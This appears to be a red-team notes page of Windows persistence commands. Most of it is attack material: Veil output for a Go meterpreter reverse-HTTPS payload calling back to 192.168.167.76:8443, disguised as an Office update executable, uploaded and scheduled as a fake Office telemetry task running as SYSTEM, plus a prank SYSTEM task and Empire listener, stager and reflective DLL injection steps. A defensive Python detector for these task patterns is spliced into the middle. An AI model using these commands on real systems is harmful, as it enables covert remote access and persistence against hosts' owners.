https://www.offensive-security.com/metasploit-unleashed/persistent-netcat-backdoor/

[*] Executable written to: /usr/share/veil-output/compiled/msoia_update.exe

Language: Go

Payload: go/meterpreter/rev_https

Required Options: COMPILE_TO_EXE=Y LHOST=192.168.167.76 LPORT=8443

Payload File: /usr/share/veil-output/source/msoia_update.go

Handler File: /usr/share/veil-output/handlers/msoia_update_handler.rc

schtasks /query

schtasks /query /TN "\GoogleUpdateTaskMachineCore" /FO list /v

schtasks /query /TN "\Microsoft\Office\OfficeTelemetryAgentLogOn" /FO list /v

Office Tasks Examples

"\Microsoft\Office\OfficeTelemetryAgentLogOn"

"\Microsoft\Office\OfficeTelemetryAgentLogOn2016"

"\Microsoft\Office\OfficeTelemetryFallBack"

"\Microsoft\Office\OfficeTelemetryFallBack2016"

msfconsole -r /usr/share/veil-output/handlers/msoia_update_handler.rc

upload /usr/share/veil-output/compiled/msoia_update.exe C:\Program Files\Microsoft Office\Office15

dir C:\Program Files\Microsoft Office\Office15

schtasks /Create /SC DAILY /TN "\Microsoft\Office\OfficeTelemetryAgent" /TR "C:\Program Files\Microsoft Office\Office15\msoia_update.exe" /ST 09:00

schtasks /query /TN "\Microsoft\Office\OfficeTelemetryAgent" /FO list /v

echo Y | schtasks /Delete /TN "\Microsoft\Office\OfficeTelemetryAgent" /F

Ricky-Rolly

schtasks /create /sc daily /st 08:00 /et 17:00 /k /rl highest /tr "C:\Program Files\Internet Explorer\iexplore.exe https://www.youtube.com/watch?v=oHg5SJYRHA0" /tn "Crush" /it /ru System /ri 59

schtasks /create /sc daily /st 07:00 /rl highest /tr "C:\Program Files\Microsoft Office\Office15\msoia_update.exe" /tn "\Microsoft\Office\OfficeTelemetryAgentUpdate" /it /ru System

schtasks /Run /TN "\Crush"

schtasks /create /sc daily /st 08:00 /et 17:00 /k /rl highest /tr "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe https://www.youtube.com/watch?v=oHg5SJYRHA0" /tn "Crush" /it /ru System /ri 59

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --new-window "https://www.youtube.com/watch?v=oHg5SJYRHA0"

PID: 3172 PPID: 964 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
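A defender-side check for the scheduled-task patterns in the notes above, added here as an example and not part of the original page: it parses a constructed, trimmed `schtasks /query /FO csv /v` export (column names assumed to match the real export) and flags tasks that sit in the \Microsoft\Office\ folder without being one of the four telemetry tasks listed above, SYSTEM tasks whose action launches a browser or a URL, and Microsoft-namespace tasks whose Author is an interactive HOST\user account.

```python
import csv
import io
import re

# Genuine Office telemetry task names, as listed on this page.
KNOWN_OFFICE_TASKS = {
    "\\Microsoft\\Office\\OfficeTelemetryAgentLogOn",
    "\\Microsoft\\Office\\OfficeTelemetryAgentLogOn2016",
    "\\Microsoft\\Office\\OfficeTelemetryFallBack",
    "\\Microsoft\\Office\\OfficeTelemetryFallBack2016",
}
SYSTEM_ACCOUNTS = {"SYSTEM", "NT AUTHORITY\\SYSTEM"}
BROWSER_OR_URL = re.compile(r"iexplore\.exe|chrome\.exe|https?://", re.IGNORECASE)
INTERACTIVE_ACCOUNT = re.compile(r"^[^\\]+\\[^\\]+$")  # HOST\user or DOMAIN\user

# Constructed sample: a trimmed `schtasks /query /FO csv /v` export keeping only the
# columns the rules read. Rows mirror the task names and paths shown on this page;
# the msoia.exe command line for the genuine task is an assumption.
SAMPLE_EXPORT = r'''"HostName","TaskName","Author","Task To Run","Run As User"
"WS01","\Microsoft\Office\OfficeTelemetryAgentLogOn","Microsoft Office","C:\Program Files\Microsoft Office\Office15\msoia.exe scan upload","WS01\alice"
"WS01","\Microsoft\Office\OfficeTelemetryAgentUpdate","WS01\alice","C:\Program Files\Microsoft Office\Office15\msoia_update.exe","SYSTEM"
"WS01","\Crush","WS01\alice","C:\Program Files\Internet Explorer\iexplore.exe https://www.youtube.com/watch?v=oHg5SJYRHA0","SYSTEM"
"WS01","\GoogleUpdateTaskMachineCore","","C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c","SYSTEM"
'''


def find_suspicious_tasks(csv_text):
    """Return (task name, reason) pairs, one per rule each task row trips."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        name, cmd = row["TaskName"], row["Task To Run"]
        run_as, author = row["Run As User"].upper(), row["Author"]
        # Rule 1: a task in the Office folder that is not one of the known telemetry tasks.
        if name.startswith("\\Microsoft\\Office\\") and name not in KNOWN_OFFICE_TASKS:
            findings.append((name, "unknown task in \\Microsoft\\Office"))
        # Rule 2: SYSTEM launching a browser or a URL has no legitimate scheduled use.
        if run_as in SYSTEM_ACCOUNTS and BROWSER_OR_URL.search(cmd):
            findings.append((name, "SYSTEM task launches a browser/URL"))
        # Rule 3: Microsoft-namespace tasks are authored by Microsoft components, not HOST\user.
        if name.startswith("\\Microsoft\\") and INTERACTIVE_ACCOUNT.match(author):
            findings.append((name, f"authored by interactive account {author}"))
    return findings


if __name__ == "__main__":
    for task, reason in find_suspicious_tasks(SAMPLE_EXPORT):
        print(f"[!] {task}: {reason}")
```

On a live host, replace SAMPLE_EXPORT with the output of `schtasks /query /FO csv /v` and extend KNOWN_OFFICE_TASKS from a clean baseline image.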

Empire > Listener

Listener > uselistener http

set Host http://YOURIP:8080

execute

Listener > usestager windows/dll http

Stager > execute

msf> post/windows/manage/reflective_dll_inject

msf > set PATH /tmp/launcher.dll
